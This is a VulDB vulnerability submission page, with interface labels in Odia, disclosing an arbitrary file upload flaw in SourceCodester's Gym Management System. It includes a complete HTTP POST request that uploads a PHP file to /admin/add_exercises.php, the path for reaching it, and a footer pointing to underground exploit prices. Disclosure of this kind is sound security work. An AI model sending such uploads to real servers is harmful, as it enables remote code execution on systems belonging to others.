ଜମା କରନ୍ତୁ #43288: Gym Management System Background management Insert Exercises Upload any file getshellସୂଚନା

ଶୀର୍ଷକ	Gym Management System Background management Insert Exercises Upload any file getshell
ବର୍ଣ୍ଣନା	info:Gym Management System Background management insert exercises to upload arbitrary files getshell First write information on the page, upload image attachments, modify the php suffix to capture the package, modify the content to malicious code, you can implement getshell, Last access path: /admin/exercise_images/[uploaded attachment name].php The RCE effect can be achieved. payload： POST /admin/add_exercises.php HTTP/1.1 Host: x.x.x.x:8090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------102894582020948544771228937950 Content-Length: 867 Origin: http://x.x.x.x:8090 Connection: close Referer: http://x.x.x.x:8090/admin/add_exercises.php Cookie: PHPSESSID=jnf3qoj22hdbq8dh1k2k1och1i Upgrade-Insecure-Requests: 1 -----------------------------102894582020948544771228937950 Content-Disposition: form-data; name="user" Select a User -----------------------------102894582020948544771228937950 Content-Disposition: form-data; name="day" Select a day -----------------------------102894582020948544771228937950 Content-Disposition: form-data; name="exercise" qqqqqqqqqqqq -----------------------------102894582020948544771228937950 Content-Disposition: form-data; name="sets" qqqqqqqqqqqq -----------------------------102894582020948544771228937950 Content-Disposition: form-data; name="exer_img"; filename="123.php" Content-Type: image/png <?php phpinfo();?> -----------------------------102894582020948544771228937950 Content-Disposition: form-data; name="insert_workout" Assign Workout -----------------------------102894582020948544771228937950--
ଉତ୍ସ	⚠️ www.sourcecodester.com/php/15515/gym-management-system-project-php.html
ଉପଭୋକ୍ତା	jsbae3449 (UID 30775)
ଦାଖଲ	08/10/2022 05:45 AM (4 ବର୍ଷ ବର୍ଷ ago)
ମଧ୍ୟମ ଧରଣର	08/10/2022 07:12 AM (1 hour later)
ସ୍ଥିତି	ଗ୍ରହଣ କରାଯାଇଛି
VulDB ଏଣ୍ଟ୍ରି	206012 [SourceCodester Gym Management System Background Management /admin/add_exercises.php exer_img ବିସ୍ତାରିତ ଅଧିକାର]
ପଏଣ୍ଟ	17

◂ ପଛକୁ ସମୀକ୍ଷା ଆହୁରି ଦୂରରେ ▸

Interested in the pricing of exploits?

See the underground prices here!